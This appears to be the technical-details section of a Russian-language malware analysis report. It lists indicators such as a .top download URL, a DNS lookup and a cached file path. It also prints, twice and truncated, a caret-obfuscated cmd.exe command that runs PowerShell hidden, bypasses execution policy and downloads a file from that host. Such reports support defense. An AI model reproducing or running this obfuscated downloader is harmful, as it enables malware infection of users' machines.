Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^E^R^sHe^l^L.eX^e^ -E^xE^cUt^i^O^NpoLi^cy B^Y^P^aS^S -^nOprof^Il^e -wI^ND^OwstYl^e H^I^DdE^n ^(^n^EW-OBj^eC^t^ ^S^y^STe^m.NE^t^.We^bcLIe^N^t)^.dOw^nl^oaD^fiLE(^'http://zus...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /C "Pow^E^R^sHe^l^L.eX^e^ -E^xE^cUt^i^O^NpoLi^cy B^Y^P^aS^S -^nOprof^Il^e -wI^ND^OwstYl^e H^I^DdE^n ^(^n^EW-OBj^eC^t^ ^S^y^STe^m.NE^t^.We^bcLIe^N^t)^.dOw^nl^oaD^fiLE(^'http://zus... (со скрытым окном)